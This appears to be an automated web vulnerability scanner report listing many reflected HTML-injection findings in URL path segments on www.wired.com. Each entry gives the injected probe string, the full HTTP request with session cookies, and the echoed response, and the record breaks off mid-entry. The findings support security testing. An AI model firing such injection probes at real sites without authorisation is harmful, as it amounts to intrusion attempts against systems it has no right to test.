<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesefacc"><a>98895960f43 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b39"><a>04ac77873cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news14b39"><a>04ac77873cd/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:41 GMT Date: Sun, 21 Nov 2010 23:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news14b39"><a>04ac77873cd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c12"><a>9b08e999a3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science33c12"><a>9b08e999a3c/discoveries/news/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:08 GMT Date: Sun, 21 Nov 2010 23:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science33c12"><a>9b08e999a3c ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef87"><a>44656895f30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries9ef87"><a>44656895f30/news/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries9ef87"><a>44656895f30 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b064d"><a>cc5c37043de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb064d"><a>cc5c37043de/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb064d"><a>cc5c37043de"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e0f8"><a>5f6502cac4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science3e0f8"><a>5f6502cac4b/discoveries/news/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:13 GMT Date: Sun, 21 Nov 2010 23:12:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science3e0f8"><a>5f6502cac4b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bbc"><a>f4bd770cc4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese9bbc"><a>f4bd770cc4f/news/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:51 GMT Date: Sun, 21 Nov 2010 23:12:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese9bbc"><a>f4bd770cc4f c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22bd1"><a>af088f8d408 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news22bd1"><a>af088f8d408/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:03 GMT Date: Sun, 21 Nov 2010 23:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news22bd1"><a>af088f8d408"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69728"><a>07ad95f1437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science69728"><a>07ad95f1437/discoveries/news/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:38 GMT Date: Sun, 21 Nov 2010 23:12:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science69728"><a>07ad95f1437 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea663"><a>000f8426a7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesea663"><a>000f8426a7e/news/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=569 Expires: Sun, 21 Nov 2010 23:22:23 GMT Date: Sun, 21 Nov 2010 23:12:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesea663"><a>000f8426a7e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad09"><a>6fa0ecd3e27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news7ad09"><a>6fa0ecd3e27/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=557 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:13:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news7ad09"><a>6fa0ecd3e27"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bda0"><a>ff99168443b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8bda0"><a>ff99168443b/discoveries/news/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:07 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8bda0"><a>ff99168443b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ddb8"><a>86307e83414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7ddb8"><a>86307e83414/news/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:45 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7ddb8"><a>86307e83414 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7a4"><a>6eee09d380b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsfc7a4"><a>6eee09d380b/2009/02/dayintech_0205 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=560 Expires: Sun, 21 Nov 2010 23:22:15 GMT Date: Sun, 21 Nov 2010 23:12:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsfc7a4"><a>6eee09d380b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28940"><a>0a1b81a1697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science28940"><a>0a1b81a1697/discoveries/news/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:24 GMT Date: Sun, 21 Nov 2010 23:12:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science28940"><a>0a1b81a1697 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832c9"><a>90caa4165d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries832c9"><a>90caa4165d3/news/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=549 Expires: Sun, 21 Nov 2010 23:21:49 GMT Date: Sun, 21 Nov 2010 23:12:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries832c9"><a>90caa4165d3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864a"><a>d516e68821c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4864a"><a>d516e68821c/2009/03/dayintech_0319 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:51 GMT Date: Sun, 21 Nov 2010 23:12:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4864a"><a>d516e68821c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88e90"><a>1b18fd01694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science88e90"><a>1b18fd01694/discoveries/news/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:03 GMT Date: Sun, 21 Nov 2010 23:12:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science88e90"><a>1b18fd01694 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e528a"><a>b36f778d09a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
